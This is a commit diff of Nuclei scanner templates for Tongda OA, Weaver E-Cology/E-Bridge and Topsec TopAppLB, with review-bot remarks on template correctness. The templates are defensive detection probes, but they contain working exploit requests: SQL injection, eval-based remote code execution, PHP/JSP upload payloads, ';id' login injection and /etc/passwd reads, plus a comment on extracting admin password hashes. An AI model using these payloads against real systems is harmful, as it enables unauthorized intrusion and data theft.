templates update -2

patch-1
Ritik Chaddha 2023-09-15 00:41:38 +05:30
parent 68f86634de
commit 9e8623a907
22 changed files with 316 additions and 339 deletions


@ -10,9 +10,9 @@ info:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml
metadata:
max-request: 1
fofa-query: fid="iaytNA57019/kADk8Nev7g=="
verified: true
tags: sangfor,ad,rce
fofa-query: fid="iaytNA57019/kADk8Nev7g=="
tags: sangfor,rce
http:
- raw:
@ -23,7 +23,6 @@ http:
clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
matchers-condition: and
matchers:
- type: dsl
dsl:


@ -1,7 +1,7 @@
id: tongda-v2017-action-uploadfile
id: tongda-action-uploadfile
info:
name: Tongda OA v2017 action_upload.php - Arbitrary File Upload
name: Tongda OA v2017 action_upload - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
@ -11,9 +11,12 @@ info:
- https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA"
verified: true
tags: tongda,fileupload
fofa-query: app="TDXK-通达OA"
tags: tongda,fileupload,intrusive
variables:
num: "999999999"
http:
- raw:
@ -21,8 +24,6 @@ http:
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
@ -44,7 +45,7 @@ http:
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
<?php echo md5(40167);unlink(__FILE__);?>
<?php echo md5({{num}});unlink(__FILE__);?>
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile"
@ -59,7 +60,7 @@ http:
matchers:
- type: word
words:
- "1f18933ca1e531c1eac9cccc4952a03b"
- '{{md5(num)}}'
- type: status
status:
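Review bot: The multipart part in the third hunk uploads under a fixed name, `filename="test.php"`, so a scan can overwrite a file of that name that the target already serves, and if the upload lands but the PHP is never executed (the `{{md5(num)}}` matcher then fails) the `unlink(__FILE__)` inside it never runs and the file stays behind. The `weaver-ktreeuploadaction-file-upload` template in this same commit avoids the first problem with `filename="{{randstr}}.jsp"`; the equivalent here is `filename="{{randstr}}.php"`, and the residue case is worth one sentence in `description` so operators know what to clean up. The `intrusive` tag added in the second hunk is the right call for this behaviour. The `raw` request and the matcher list both extend beyond the visible hunks.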


@ -1,19 +1,19 @@
id: tongda-contact-list-disclosure
id: tongda-contact-list-exposure
info:
name: Tongda OA v2014 Get Contactlistt - Exposure
name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
author: SleepingBag945
severity: medium
description: |
There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,oa,exposure
http:
- method: GET
path:
@ -23,9 +23,10 @@ http:
matchers:
- type: word
words:
- "user_uid"
- "user_name"
- "priv_name"
- 'user_uid":'
- 'user_name":'
- 'priv_name":'
condition: and
- type: status
status:
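Review bot: The renamed `name` line still carries the typo `Contactlistt`; since the line is being rewritten anyway it should read `name: Tongda OA v2014 Get Contactlist - Sensitive Information Disclosure`. Changing `id` from `tongda-contact-list-disclosure` to `tongda-contact-list-exposure` also invalidates any `-id` filters or exclusion lists that reference the old identifier, which deserves a mention in the commit message or a changelog note; the `reference` URL still uses the old name, but that is an external path and is fine as is. The tightened words (`'user_uid":'` etc.) are a good change: they require JSON-key context rather than a bare token.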


@ -1,7 +1,7 @@
id: tongda-getdata-rce
info:
name: Tongda OA v11.9 getadata - Remoce Code Execution
name: Tongda OA v11.9 getadata - Remote Code Execution
author: SleepingBag945
severity: critical
description: |
@ -10,21 +10,27 @@ info:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA"
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,rce
variables:
payload: "echo RCE;"
num: '999999999'
payload: "echo md5({{num}});"
http:
- method: GET
path:
- "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "RCE") && contains(body, "pagelimit")'
- 'status_code == 200'
condition: and
- type: word
words:
- '{{md5(num)}}'
- 'pagelimit'
condition: and
- type: status
status:
- 200
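Review bot: The corrected `name` line still misspells the endpoint as `getadata`; while the word `Remoce` is being fixed it should become `name: Tongda OA v11.9 getdata - Remote Code Execution`, matching the `id` and the URL path. `num: '999999999'` is single-quoted here while every other template in this commit writes `num: "999999999"`; either is valid YAML, but one convention per commit makes the `{{md5(num)}}` idiom easier to grep. A comment above `variables:` such as `# num is a fixed marker; md5(num) in the matcher proves the injected echo ran` would explain why the value is constant.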


@ -10,8 +10,8 @@ info:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA"
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,sqli
http:
@ -23,13 +23,15 @@ http:
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
matchers-condition: and
matchers:
- type: word
part: header
words:
- "PHPSESSID="
- "register_for/?rid="
condition: and
- type: status
status:
- 302
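Review bot: The new matcher block only establishes that the request produced a 302 whose headers carry `PHPSESSID=` and `register_for/?rid=`, which is the normal success path of the registration handler rather than direct evidence that the injected `exp(if(...))` expression was evaluated; a build that stores the string verbatim can redirect the same way. If that trade-off is accepted, a comment above `matchers:` like `# 302 to register_for/?rid= means the INSERT succeeded; a build that stores the input literally redirects the same way` makes the confidence level explicit for triage. The request body begins before this hunk, so the complete payload could not be reviewed here.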


@ -5,14 +5,13 @@ info:
author: SleepingBag945
severity: medium
description: |
Tongda Meeting Unauthorized Access wereDetected
Tongda Meeting Unauthorized Access were Detected.
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html
- https://github.com/chaitin/xray/blob/master/pocs/tongda-meeting-unauthorized-access.yml
- https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10
metadata:
max-request: 1
fofa-query: app="TDXK-通达OA
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,unauth,misconfig
http:
@ -20,21 +19,9 @@ http:
path:
- "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay"
matchers-condition: and
matchers:
- type: word
words:
- "creator"
- "originalTitle"
- "view"
- "type"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
- type: dsl
dsl:
- status_code == 200 && contains(header, 'application/json')
- contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":')
condition: and
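Review bot: The second `dsl` entry is a plain (unquoted) YAML scalar, so the backslashes in `'creator\":'` reach the DSL engine untouched, whereas the E-Bridge template added in this commit expresses the same idea inside a double-quoted YAML string (`"... 'status\":\"error' ..."`), where YAML consumes the escape and the DSL sees a bare `"`. Whether the DSL's single-quoted literal also unescapes `\"` is not visible on this page, so one of the two forms is probably not matching what the author intends; pick one convention and confirm it against a captured response. The `description` line `Tongda Meeting Unauthorized Access were Detected.` still reads awkwardly; `Tongda Meeting calendar data is accessible without authentication.` says the same thing plainly.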


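--- /dev/null
+++ b/PATH-NOT-SHOWN/topsec-topapplb-auth-bypass.yaml
@@ -0,0 +1,37 @@
+id: topsec-topapplb-auth-bypass
+info:
+name: Topsec TopAppLB - Authentication Bypass
+author: SleepingBag945
+severity: high
+description: |
+Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
+reference:
+- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
+metadata:
+max-request: 1
+verified: true
+fofa-query: title="TopApp-LB 负载均衡系统"
+tags: topsec,topapplb,auth-bypass
+http:
+- raw:
+- |
+POST /login_check.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+userName=admin&password=%3Bid
+- |
+GET / HTTP/1.1
+Host: {{Hostname}}
+cookie-reuse: true
+matchers:
+- type: dsl
+dsl:
+- 'status_code_1 == 302 && status_code_2 == 200'
+- 'contains(body_2,"var IsHeadMin ")'
+- 'contains(header_1,"redirect.php") && !contains(tolower(header_1), "error=1")'
+condition: and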
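Review bot: `max-request: 1` undercounts: the `raw` block sends two requests (the POST to `/login_check.php` and the follow-up `GET /`), so it should read `max-request: 2`, as the getSqlData template in this commit does for its two paths. The description has a spelling and spacing slip, `authetication bypass .Enter`, which should be `authentication bypass. Enter`. A comment above the POST body noting that `%3Bid` is the URL-encoded `;id` named in the description would spare readers a decode, and the matcher's negative term `!contains(tolower(header_1), "error=1")` deserves a note saying which failure response it screens out.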


@ -15,17 +15,18 @@ info:
fofa-query: app="万户网络-ezOFFICE"
tags: wanhu,sqli
http:
- raw:
- |
GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1
@timeout: 15s
GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'duration>=7'
- 'status_code == 200'
- 'contains(body, "iSignature HTML V6")'
- 'contains_all(body, "iSignature", "DoYFSignature")'
condition: and
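Review bot: The success criterion `duration>=7` is a single wall-clock measurement, so a slow or overloaded host can exceed 7 s without the `WAITFOR DELAY` ever executing; the `status_code == 200` and `contains_all(body, "iSignature", "DoYFSignature")` terms pin the right page but do not separate injection from latency. With `@timeout: 15s` the gap between the expected delay and the timeout is also narrow on a slow link. If a baseline comparison is out of scope, a comment above `matchers:` such as `# time-based: no baseline request is compared, expect false positives on slow hosts` documents the trade-off. The `raw` list starts before this hunk.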


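--- /dev/null
+++ b/PATH-NOT-SHOWN/ecology-jqueryfiletree-traversal.yaml
@@ -0,0 +1,34 @@
+id: ecology-jqueryfiletree-traversal
+info:
+name: Weaver E-Cology JqueryFileTree - Directory Traversal
+author: SleepingBag945
+severity: medium
+description: |
+Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability.
+reference:
+- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24
+metadata:
+max-request: 1
+verified: true
+shodan-query: ecology_JSessionid
+fofa-query: app="泛微-协同办公OA"
+tags: weaver,ecology,traversal,lfr
+http:
+- method: GET
+path:
+- "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "'index.jsp','"
+- "重命名"
+- "新建目录"
+condition: and
+- type: status
+status:
+- 200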
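Review bot: `name` says `Weaver E-Cology` while `description` says `Panwei OA E-Cology`; 泛微 is one vendor and every other template title on this page uses Weaver, so the description should read `Weaver OA E-Cology jqueryFileTree.jsp directory traversal vulnerability.` The same Panwei/Weaver mismatch is in the descriptions of `weaver-ecology-getsqldata-sqli` and `weaver-ecology-hrmcareer-sqli` added by this commit. The matcher keys on two Chinese UI strings; a comment such as `# "Rename" / "New directory" labels emitted by the file-tree connector` above `words:` would tell non-Chinese readers what is being matched. The `lfr` tag is unexplained for a listing-only traversal; if no file contents are read, `traversal` alone is more accurate.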


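--- a/PATH-NOT-SHOWN/weaver-e-bridge-linux-saveyzjfile-file-read.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: weaver-e-bridge-linux-saveyzjfile-file-read
-info:
-name: weaver-e-bridge-linux-saveyzjfile-file-read
-author: SleepingBag945
-severity: high
-description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
-reference:
-- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
-tags: eBridge,weaver,oa,read
-http:
-- raw:
-- |
-GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
-Host: {{Hostname}}
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-Accept: */*
-Accept-Encoding: gzip
-- |
-GET /file/fileNoLogin/{{idname}} HTTP/1.1
-Host: {{Hostname}}
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-Accept: */*
-Accept-Encoding: gzip
-extractors:
-- type: regex
-name: idname
-internal: true
-group: 1
-regex:
-- '"id":"(.*?)"'
-req-condition: true
-matchers-condition: and
-matchers:
-- type: dsl
-dsl:
-- status_code_1 == 200 && contains(body_1,'id')
-- "status_code_2 == 200 && contains(body_2, 'root:x:0')"
-condition: and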


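--- a/PATH-NOT-SHOWN/weaver-e-bridge-windows-saveyzjfile-file-read.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: weaver-e-bridge-windows-saveyzjfile-file-read
-info:
-name: weaver-e-bridge-windows-saveyzjfile-file-read
-author: SleepingBag945
-severity: high
-description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
-reference:
-- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
-tags: eBridge,weaver,oa,read
-http:
-- raw:
-- |
-GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt HTTP/1.1
-Host: {{Hostname}}
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-Accept: */*
-Accept-Encoding: gzip
-- |
-GET /file/fileNoLogin/{{idname}} HTTP/1.1
-Host: {{Hostname}}
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-Accept: */*
-Accept-Encoding: gzip
-extractors:
-- type: regex
-name: idname
-internal: true
-group: 1
-regex:
-- '"id":"(.*?)"'
-req-condition: true
-matchers-condition: and
-matchers:
-- type: dsl
-dsl:
-- status_code_1 == 200 && contains(body_1,'id')
-- "status_code_2 == 200 && contains(body_2, 'Program Files')"
-condition: and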


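--- a/PATH-NOT-SHOWN/weaver-e-cology-getdata-sqli.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: weaver-e-cology-getdata-sqli
-info:
-name: weaver-e-cology-getdata-sqli
-author: SleepingBag945
-severity: high
-description: 泛微e-cology OA系统的在 getdata.jsp 中,传入参数 cmd 值等于 getSelectAllId 时, 将从请求中获取 sql 参数值执行,导致 sql 注入
-reference:
-- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
-tags: ecology,weaver,oa,sqli
-http:
-- raw:
-- |
-GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20str(40198*43774)%20as%20id HTTP/1.1
-Host: {{Hostname}}
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-Accept: */*
-Accept-Encoding: gzip
-matchers-condition: and
-matchers:
-- type: word
-part: body
-words:
-- "1759627252"
-- type: status
-status:
-- 200
-# Enhanced by md on 2022/10/31
-# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录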


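--- a/PATH-NOT-SHOWN/weaver-e-cology-getsqldata-sqli.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: weaver-e-cology-getsqldata-sqli
-info:
-name: weaver-e-cology-getsqldata-sqli
-author: SleepingBag945
-severity: high
-description: 泛微e-cology OA系统的getSqlData接口在使用mssql数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞
-reference:
-- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
-tags: ecology,weaver,oa,sqli
-http:
-- raw:
-- |
-GET /Api/portal/elementEcodeAddon/getSqlData?sql=sql=select%20@@version HTTP/1.1
-Host: {{Hostname}}
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-Accept: */*
-Accept-Encoding: gzip
-matchers-condition: and
-matchers:
-- type: word
-part: body
-words:
-- '{"api_status":'
-- '"status":true}'
-condition: and
-- type: status
-status:
-- 200
-# Enhanced by md on 2022/10/31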


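--- a/PATH-NOT-SHOWN/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: weaver-e-cology-hrmcarreerapplyperview-sqli
-info:
-name: weaver-e-cology-hrmcarreerapplyperview-sqli
-author: SleepingBag945
-severity: high
-description: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞攻击者通过漏洞可以获取服务器数据库敏感文件
-reference:
-- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
-tags: ecology,weaver,oa,sqli
-http:
-- raw:
-- |
-GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 HTTP/1.1
-Host: {{Hostname}}
-Content-Type: text/xml;charset=UTF-8
-matchers-condition: and
-matchers:
-- type: word
-part: body
-words:
-- "900150983cd24fb0d6963f7d28e17f72"
-- type: status
-status:
-- 200
-# Enhanced by md on 2022/10/31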


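--- a/PATH-NOT-SHOWN/weaver-e-cology-jqueryfiletree-directory-traversal.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: weaver-e-cology-jqueryfiletree-directory-traversal
-info:
-name: weaver e-cology-jqueryfiletree-directory-traversal
-author: SleepingBag945
-severity: medium
-description: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
-reference:
-- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
-tags: weaver,e-cology,oa
-http:
-- raw:
-- |
-GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1
-Host: {{Hostname}}
-Content-Type: application/x-www-form-urlencoded
-matchers-condition: and
-matchers:
-- type: word
-words:
-- "'index.jsp','"
-- type: word
-words:
-- "重命名"
-- type: word
-words:
-- "新建目录"
-- type: status
-status:
-- 200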


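--- a/PATH-NOT-SHOWN/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml
+++ /dev/null
@@ -1,53 +0,0 @@
-id: weaver-e-cology-ktreeuploadaction-arbitrary-file-upload
-info:
-name: weaver e-cology KtreeUploadAction arbitrary file upload
-author: SleepingBag945
-severity: critical
-description: 泛微E-Cology存在文件上传漏洞攻击者可以通过KtreeUploadAction.jsp上传任意文件并且进一步进行利用
-reference:
-- https://buaq.net/go-117479.html
-tags: ecology,upload,fileupload,intrusive
-http:
-- raw:
-- |
-POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
-Host: {{Hostname}}
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-Accept: */*
-Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
-Accept-Encoding: gzip
-------WebKitFormBoundarywgljfvib
-Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
-Content-Type: image/jpeg
-<%out.print(43997 * 41858);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
-------WebKitFormBoundarywgljfvib--
-- |
-GET {(unknown)} HTTP/1.1
-Host: {{Hostname}}
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-Accept: */*
-Accept-Encoding: gzip
-extractors:
-- type: regex
-name: filename
-internal: true
-group: 1
-regex:
-- "','url':'(.*?)','title"
-req-condition: true
-matchers-condition: and
-matchers:
-- type: dsl
-dsl:
-- "status_code_1 == 200 && contains(body_1,'original')"
-- "contains(body_2, '1841626426') && status_code_2 == 200"
-condition: and
-# Enhanced by md on 2022/10/31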


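--- /dev/null
+++ b/PATH-NOT-SHOWN/weaver-ebridge-lfi.yaml
@@ -0,0 +1,50 @@
+id: weaver-ebridge-lfi
+info:
+name: Weaver E-Bidge saveYZJFile - Local File Read
+author: SleepingBag945
+severity: high
+description: |
+There is an arbitrary file reading vulnerability in the Weaver OA E-Bridge saveYZJFile interface. An attacker can read any file on the server through the vulnerability.
+reference:
+- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
+metadata:
+max-request: 1
+verified: true
+shodan-query: eBridge_JSessionid
+fofa-query: app="泛微云桥e-Bridge"
+tags: eBridge,weaver,oa,lfi,lfr,intrusive
+http:
+- raw:
+- |
+GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl={{path}} HTTP/1.1
+Host: {{Hostname}}
+- |
+GET /file/fileNoLogin/{{idname}} HTTP/1.1
+Host: {{Hostname}}
+attack: pitchfork
+payloads:
+path:
+- file:///C:/&fileExt=txt
+- file:///etc/passwd&fileExt=txt
+stop-at-first-match: true
+skip-variables-check: true
+matchers:
+- type: dsl
+dsl:
+- "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')"
+- "status_code_2 == 200 && contains(header_2, 'filename=')"
+- "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)"
+condition: and
+extractors:
+- type: regex
+name: idname
+internal: true
+group: 1
+regex:
+- '"id":"(.*?)"'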
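Review bot: Two of the `dsl` terms address the unindexed `body` (`!contains(tolower(body), ...)` at the end of the first entry and `regex('root:.*:0:0:', body)` in the third) while the rest of the block uses `body_1`/`body_2`; in a two-request raw block the unindexed name is not obviously the response the author means, so these should read `body_1` and `body_2` respectively if they are meant to check the upload reply and the fetched file. `max-request: 1` also undercounts: two raw requests are sent for each of the two pitchfork payloads, so the figure should be `4` (or documented as per-payload). `name: Weaver E-Bidge` is a typo for `E-Bridge`. A comment above `payloads:` explaining why `&fileExt=txt` is carried inside each payload value rather than as a separate query parameter would help the next editor keep the two in sync.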


@ -1,10 +1,16 @@
id: weaver-e-cology-bshservlet-rce
id: weaver-ecology-bshservlet-rce
info:
name: Weaver E-Cology BeanShell Remote Command Execution
name: Weaver E-Cology BeanShell - Remote Command Execution
author: SleepingBag945
severity: critical
description: Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
description: |
Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
metadata:
max-request: 1
verified: true
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
tags: beanshell,rce,weaver
http:
@ -16,7 +22,6 @@ http:
bsh.script=print%28%22{{randstr}}%22%29%3B
- raw:
- | # bypass waf
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
@ -26,15 +31,12 @@ http:
matchers-condition: and
matchers:
- type: word
words:
- type: regex
regex:
- "BeanShell Test Servlet"
- type: word
words:
- "{{randstr}}"
- "(?i)<pre>(\n.*){{randstr}}"
condition: and
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05
- 200
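Review bot: The new `regex` entry `"(?i)<pre>(\n.*){{randstr}}"` is a double-quoted YAML scalar, so YAML converts `\n` into a literal newline before the regex engine sees the pattern; that still matches a line break, but the group then admits exactly one line between `<pre>` and the marker, and anyone editing the pattern will read `\n` as a regex escape. Single-quoting it, `'(?i)<pre>(\n.*){{randstr}}'`, hands the backslash to the regex engine and matches the quoting used by the `'{{md5(num)}}'` matchers elsewhere in this commit. The second hunk is shown with one line dropped but this rendering does not say which; the `raw` list it belongs to continues outside the hunk.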


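--- /dev/null
+++ b/PATH-NOT-SHOWN/weaver-ecology-getsqldata-sqli.yaml
@@ -0,0 +1,39 @@
+id: weaver-ecology-getsqldata-sqli
+info:
+name: Weaver E-Cology `getsqldata` - SQL Injection
+author: SleepingBag945
+severity: high
+description: |
+When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
+reference:
+- https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+metadata:
+max-request: 2
+verified: true
+shodan-query: ecology_JSessionid
+fofa-query: app="泛微-协同办公OA"
+tags: ecology,weaver,oa,sqli
+variables:
+num: "999999999"
+http:
+- method: GET
+path:
+- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+- "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version"
+stop-at-first-match: true
+matchers:
+- type: word
+part: body
+words:
+- '{{md5(num)}}'
+- type: word
+part: body
+words:
+- '{"api_status":'
+- '"status":true}'
+condition: and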
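Review bot: No `matchers-condition` is declared, and nuclei's default is `or`, so the second word matcher (`{"api_status":` together with `"status":true}`) can report a finding on its own for the `select @@version` path even when the `{{md5(num)}}` echo never appears; any deployment that answers that path with a well-formed JSON success envelope would then be flagged as injectable. If the md5 echo is the real proof and the envelope also accompanies it, `matchers-condition: and` ties the result to the echo; if the second path is intended as a weaker fallback, a comment above it saying so would stop a reviewer from "fixing" it. The backticks in `name: Weaver E-Cology \`getsqldata\` - SQL Injection` are not used by any other title on this page and will show up verbatim in reports.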


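--- /dev/null
+++ b/PATH-NOT-SHOWN/weaver-ecology-hrmcareer-sqli.yaml
@@ -0,0 +1,35 @@
+id: weaver-ecology-hrmcareer-sqli
+info:
+name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
+author: SleepingBag945
+severity: high
+description: |
+There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
+reference:
+- https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+metadata:
+max-request: 1
+verified: true
+shodan-query: ecology_JSessionid
+fofa-query: app="泛微-协同办公OA"
+tags: ecology,weaver,oa,sqli
+variables:
+num: "999999999"
+http:
+- method: GET
+path:
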